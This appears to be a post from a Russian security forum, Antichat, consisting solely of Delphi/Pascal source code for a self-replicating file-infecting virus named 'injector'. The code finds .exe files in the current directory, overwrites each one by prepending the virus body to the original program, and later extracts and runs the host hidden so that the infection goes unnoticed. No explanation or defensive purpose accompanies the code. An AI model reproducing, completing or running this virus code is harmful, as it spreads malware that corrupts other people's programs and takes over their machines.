ANTICHAT — форум по информационной безопасности, OSINT и технологиям

program injector;

uses
  windows,sysutils,shellapi;

const virsize=44032;

var
victims:tsearchrec;
f1,f2:file;

procedure infect(victim:string);
var
  a:integer;
  Buf: array[1..virsize] of byte;
  nr,nw:longint;
begin
  try
    randomize;
    assignfile(f1,victim);
    a:=random(200);
    rename(f1,'bad'+inttostr(a)) ;
    filemode :=0;
    assignfile(f2,paramstr(0));
    reset(f2,1) ;
    seek(f2,0);
    blockread(f2,buf,virsize);
    filemode:=2 ;
    closefile(f2);
    assignfile(f1,victim);
    rewrite(f1,1);
    blockwrite(f1,buf,virsize);
    assignfile(f2,'bad'+inttostr(a));
    reset(f2,1);
    seek(f2,0);
  repeat
    BlockRead(f2, Buf,virsize, NR);
    BlockWrite(f1, Buf, NR, NW);
  until (NR = 0) or (NW <> NR);
    closefile(f1);
    closefile(f2);
    deletefile(pchar('bad'+inttostr(a)))
  except
  end;
end;

procedure go;
label 10;
var
  Buf: array[1..virsize] of byte;
  rect:trect;
  nr,nw:longint;
begin
  ////
  try
    filemode :=0;
    assignfile(f1,paramstr(0));
    reset(f1,1);
    filemode :=2;
    assignfile(f2,paramstr(0)+'.exe');
    rewrite(f2,1);
    seek(f1,virsize);
    seek(f2,0) ;
  repeat
    filemode :=0;
    BlockRead(f1, Buf,virsize, NR);
    filemode :=2;
    BlockWrite(f2, Buf, NR, NW);
    until (NR = 0) or (NW <> NR) ;
    closefile(f1);
    closefile(f2);
    ShellExecute(0,'open',pchar(paramstr(0)+ '.exe'), nil, nil, SW_Hide);
    if not deletefile(pchar(paramstr(0)+'.exe')) then
    begin
      //--
    end;
    except
  end;
   ////
end;

begin
  filemode :=0;
  assignfile(f1,paramstr(0));
  reset(f1,1);
  if filesize(f1)>virsize then go;
  closefile(f1);
  filemode :=2;
  if FindFirst('*.exe', Faanyfile, victims) = 0 then
  repeat
    if not ((victims.Name)=extractfilename(paramstr(0))) then begin
    if not ((victims.Name)=extractfilename(extractfilename(paramstr(0)))) then infect(victims.Name);
  end;
  until FindNext(victims)<>0 ;
end.